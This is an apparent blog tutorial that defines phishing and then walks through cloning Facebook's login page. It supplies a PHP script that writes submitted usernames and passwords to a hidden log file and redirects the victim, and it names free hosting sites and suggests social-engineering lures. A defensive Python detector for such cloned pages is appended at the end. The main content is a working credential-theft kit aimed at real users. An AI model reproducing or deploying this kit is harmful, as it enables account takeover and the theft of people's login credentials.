INTRODUCTION TO PHISHING
According to Wikipedia, phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware.
Phishing is typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and it exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.
A phishing technique was described in detail in 1987, and (according to its creator) the first recorded use of the term “phishing” was made in 1995. The term is a variant of fishing, probably influenced by phreaking, and alludes to “baits” used in hopes that the potential victim will “bite” by clicking a malicious link or opening a malicious attachment, in which case their financial information and passwords may then be stolen.
From the information above you now know what phishing is. The demonstration below shows how it works against a well-known website.
DEMONSTRATION
So now, lets start demonstration of phishing with one of your 
favorite social networking website or emailing website. There are many 
more, and this method will be apply to each and everyone like gmail.com,
 yahoo.com,live.com, hotmail.com, facebook.com, twitter.com, flicr, 
mail.com, rediffmail.com, in.com and rest of the websites which provide 
these services.
So I am gonna demonstrate you on facebook.
Step-1 :-
 Register to any free web hosting website. Some website give cpanel 
hosting, which is better for phishing, but however there are huge 
websites which provide free hosting, Some of them are -
www.000webhost.com
www.100gb.co
www.x10hosting.com
Register with one of above free web hosting and confirm this hosting. once you done this, go to step-2.
Step-2 :- Now go www.facebook.com
 and press Ctrl+U or right click on web page and view source, now copy 
this all source code and paste it into the new notepad file.
Step-3 :- Now save this notepad file with name index.html on your desktop or a folder where you want.
Step-4 :- Now open one more notepad file and copy the below whole code into it.   
<?php***
header (‘Location: http://www.facebook.com/ ‘);
$handler = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handler, $variable);
fwrite($handler, “=”);
fwrite($handler, $value);
fwrite($handler, “\r\n”);
}
fwrite($handler, “\r\n”);
fclose($handler);
exit;
?>
From <?php to ?>, copy content to new notepad file and save it with any anyname.php, I am gonna save it with name login.php, you can put anyname that you want but ensure that extension should be “.php”. In the content there is a txt file (log.txt), you can put any name to txt which is not guessable, I just pur log.txt but you should that name is unguessable and its extension may b .txt or nothing.
Step-5 :-
 Now, again open index.html file into notepad (I would like to 
recommended you to use Notepad++ for these kind of tasks, awesome and 
flexible text editor), and find (Ctrl+F for find) keyword “action” here.
 you will see a keyword action=”https://www.face****” something like 
this, remove this whole link which is unde double quotes “” and put here
 “login.php”. Save it and exit (Ctrl+S for save).
Step-6 :-
 Now upload login.php and index.html file to you file manager directory.
 If it is cpanel account, upload files into file_manager -> 
public_html or if it is 000webhost.com account upload index.html and 
login.php into file manager as show in below image
If you are logged into your 000webhost.com account, click on the “Go to Cpanel“  in front of your domain that you had registered, and then Go to “File Manager” under Files and log into it. Now click on the public_html. Now click on upload and upload your both files.
Step-7 :-
 Now visit to your subdomain, like yourname.000webhost.com and you will 
see a phishing page of facebook.com. nowsend this link to a victim, say 
anything like join my network or any social engineering trick and force 
victim to visit you page and let him/her enter the username and 
password. Once he/she enter information, username and password will be 
save into log.txt file and victim will redirect to facebook’s original 
link facebook.com. Victim will seems like he did enter wrong username 
and password so he should enter again, when he again will enter a info, 
he/she will successfully login into their facebook account. Game 
over!!!!. :D  
Step-8 :-
 Now go to yourname.000webhost.com/log.txt and see the username and 
password of victim. or you can again visit to your cpanel, here in file 
manager–>public_html you will se a file log.txt, open it to view 
victim’s username and password.
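From the defender's side, the page built in Steps 2 to 5 has a checkable signature: its title claims the brand, yet it is served from, and posts its password form to, a host outside the brand's domain. The check below is an added example, not code from the original post; `BRAND_HOSTS`, `BRAND_WORDS`, the host `clone.example` and the sample HTML are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

BRAND_HOSTS = {"facebook.com"}  # assumption: hosts the real login is served from
BRAND_WORDS = ("facebook",)     # assumption: title words that claim the brand

class LoginForms(HTMLParser):
    """Collect the page title and the action of each form with a password input."""
    def __init__(self):
        super().__init__()
        self.title, self.current = "", None
        self.action, self.actions = None, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        self.current = tag
        if tag == "form":
            self.action = a.get("action") or ""  # empty action posts back to the page
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            if self.action is not None and self.action not in self.actions:
                self.actions.append(self.action)

    def handle_endtag(self, tag):
        self.current = None
        if tag == "form":
            self.action = None

    def handle_data(self, data):
        if self.current == "title":
            self.title += data

def is_brand_host(host):
    host = (host or "").lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in BRAND_HOSTS)

def assess(page_url, html):
    """Findings for a page fetched from page_url; an empty list means not flagged."""
    p = LoginForms()
    p.feed(html)
    if not p.actions or not any(w in p.title.lower() for w in BRAND_WORDS):
        return []
    checks = [("served from", page_url)]
    checks += [("posts to", urljoin(page_url, a)) for a in p.actions]
    return [f"{role} {urlsplit(u).hostname}" for role, u in checks
            if not is_brand_host(urlsplit(u).hostname)]

# Constructed sample: a copied login page whose form action points at a local script.
CLONE = ('<title>Facebook - Log In</title><form action="login.php" method="post">'
         '<input type="text" name="email"><input type="password" name="pass"></form>')
```

A mail gateway or URL sandbox can run `assess` on the fetched landing page of any link in a message; the relative `login.php` action resolves against the page URL, so the clone is flagged on both counts.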